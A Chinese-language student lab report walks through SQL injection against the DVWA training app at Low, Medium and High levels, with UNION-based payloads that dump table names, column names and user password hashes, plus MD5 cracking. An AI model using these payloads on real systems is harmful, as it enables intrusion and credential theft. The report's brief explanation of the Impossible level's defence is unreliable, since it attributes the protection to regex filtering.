【实验内容及要求】
一、内容:掌握SQL注入攻击的原理,掌握基本SQL注入攻击的方法,掌握防SQL注入攻击的基本措施。
二、要求:
- DVWA环境配置
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是:Brute Force(暴力破解);Command Injection(命令行注入);CSRF(跨站请求伪造);File Inclusion(文件包含);File Upload(文件上传);Insecure CAPTCHA (不安全的验证码);SQL Injection(SQL注入);SQL Injection(Blind)(SQL盲注);XSS(Reflected)(反射型跨站脚本);XSS(Stored)(存储型跨站脚本)。在DVWA 1.9的代码分为四种安全级别:Low,Medium,High,Impossible,可以接触一些PHP代码审计的内容。
本实验要求在下载安装并配置好DVWA实验环境,在DVWA中创建数据库,并进行登录。
- SQL注入
在DVWA中选择SQL injection,其难度等级分为low、medium、high和impossible。随后根据自身情况进行四种等级的SQL注入实验。
- 亦可使用sqlmap来进行SQL注入攻击实验。
【实验平台】
【实验步骤】
一、实验环境的搭建
1.将DVWA安装包解压到如图所示相应位置,并备份修改config.inc.php.dist文件配置,然后将安装包解压。
data:image/s3,"s3://crabby-images/ff022/ff022e2741e8952623cde96ba76fc6841c1db9f6" alt=""
data:image/s3,"s3://crabby-images/c87bb/c87bbbf727d9b64c82431c7791174d9fa8a6f56e" alt=""
data:image/s3,"s3://crabby-images/afdd7/afdd77f99128fea076222d74395b70bb24afc339" alt=""
2.更改文件夹权限,并重启apache服务。
data:image/s3,"s3://crabby-images/33086/3308646f1613d649a846889584ee043d887fe0c0" alt=""
data:image/s3,"s3://crabby-images/13625/13625ceb95e646eb58ff0d096406bafcd42054d3" alt=""
3.登录搭建好的网站,更改配置,然后点击Create/Reset Database登录。
data:image/s3,"s3://crabby-images/3732a/3732a0fbd4ee108b6dba3af5f369892e55ff16fd" alt=""
二、Low级别的SQL注入
判断注入点。
找闭合,输入1'报错"You have an error in your SQL syntax";输入1''不报错,说明闭合是单引号。
输入1' or '1234'='1234,获得所有First name和Surname。
data:image/s3,"s3://crabby-images/d746d/d746d4990abe79fadb4830080c9a483ed0624077" alt=""
输入1' or 1=1 order by 1 #,判断有几个字段;
data:image/s3,"s3://crabby-images/6d66c/6d66c8a8cbb408e33570147c58ce2e3b7c0c8481" alt=""
输入1' or 1=1 order by 2 #;
data:image/s3,"s3://crabby-images/3aca6/3aca6b6121e6885c43d3147c03472aa56f3b72cc" alt=""
输入1' or 1=1 order by 3 #,说明SQL语句查询查询的表的字段数为2。
data:image/s3,"s3://crabby-images/2c3e5/2c3e52b30c36942d9097206fafe05869f735418a" alt=""
输入1' union select 1,2 #,判断回显。
data:image/s3,"s3://crabby-images/63f14/63f145865ed183f4d49b2ab7cffc9f89093c5391" alt=""
爆库,输入1' union select 1,database() #,判断使用的数据库。
data:image/s3,"s3://crabby-images/367eb/367eb67f7d8e1e6a0ec2878770460f75c258d59b" alt=""
爆表,输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,获得该数据库的表名。
data:image/s3,"s3://crabby-images/cda91/cda911630a9b1b8ce5bcf3b17c1b4c4904b81fa4" alt=""
爆列,输入1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #,获得user表的列名。
data:image/s3,"s3://crabby-images/cda91/cda911630a9b1b8ce5bcf3b17c1b4c4904b81fa4" alt=""
输入1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,获得用户名和密码。
data:image/s3,"s3://crabby-images/fb2f2/fb2f29889aca9a09c56774117c339ad28ba47ac4" alt=""
密码均为MD5加密,使用CMD5可进行破解。
三、Medium级别SQL注入
由于界面不允许自行输入,使用BurpSuite进行抓包。
更改为id=4 or 1=1 #&Submit=Submit可获得所有用户。
data:image/s3,"s3://crabby-images/7b481/7b481048daff18d6e08fc3a9b59e3079ec7842a8" alt=""
更改为id=4 order by 2 #&Submit=Submit确定列数。
data:image/s3,"s3://crabby-images/8f804/8f80426edd09ce7b636ed43de1e5238dedd309a6" alt=""
data:image/s3,"s3://crabby-images/fecae/fecae302a530d21373b03bcb987ebf2455911b73" alt=""
更改为id=4 union select 1,2 #&Submit=Submit,判断回显。
data:image/s3,"s3://crabby-images/7eb7f/7eb7fc316f47338a53966b0356d8d87472c30674" alt=""
更改为id=4 union select 1,database() #&Submit=Submit,爆库。
data:image/s3,"s3://crabby-images/00483/0048341aa54a6da8749fbcd8adb0381c9a64e885" alt=""
更改为id=4 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&Submit=Submit,爆表。
data:image/s3,"s3://crabby-images/b34b9/b34b9e57f2d5e9cfbba9328fc104d7b62d640f8e" alt=""
更改为id=4 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&Submit=Submit,爆列。(其中0x7573657273为users的十六进制ascii码)
data:image/s3,"s3://crabby-images/e3206/e320624007bc725d4d543c474ec978c8cf275136" alt=""
更改为id=4 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #&Submit=Submit,获得用户名和密码。
data:image/s3,"s3://crabby-images/2f1d2/2f1d2d15a89137c86ee1e1f69d5fc75579e14f2e" alt=""
四、High级别SQL注入
判断注入点。
找闭合,输入1'报错"You have an error in your SQL syntax";输入1''不报错,说明闭合是单引号。
输入1' or 1=1#,获得所有First name和Surname。
data:image/s3,"s3://crabby-images/30472/304725dff9136dbe906c9459b51808c1c48b8c5b" alt=""
输入1' or 1=1 order by 2 #,判断有几个字段;
data:image/s3,"s3://crabby-images/56a3c/56a3ca8036b606c58129424c1a6e0311e9be3952" alt=""
输入1' or 1=1 order by 3 #,说明SQL语句查询查询的表的字段数为2。
data:image/s3,"s3://crabby-images/56a3c/56a3ca8036b606c58129424c1a6e0311e9be3952" alt=""
输入1' union select 1,2 #,判断回显。
data:image/s3,"s3://crabby-images/20c49/20c4990161acb40666613a504453e0f57baef2be" alt=""
爆库,输入1' union select 1,database() #,判断使用的数据库。
data:image/s3,"s3://crabby-images/c15ff/c15ffb09e1414a4a88d7b95058cd64ea59092cf3" alt=""
爆表,输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,获得该数据库的表名。
data:image/s3,"s3://crabby-images/0f299/0f299bf716553c4281482a612930706cf8251e58" alt=""
爆列,输入1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #,获得user表的列名。
data:image/s3,"s3://crabby-images/91b91/91b9160127b309c758a489bdbbc15b24ebff936b" alt=""
输入1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,获得用户名和密码。
data:image/s3,"s3://crabby-images/af6af/af6af7026f31d0108fd7fd9c66ae1fc5b79367d9" alt=""
五、Impossible级别
无法注入,因为Impossible级别的源码使用正则表达式过滤掉了不合法的字符。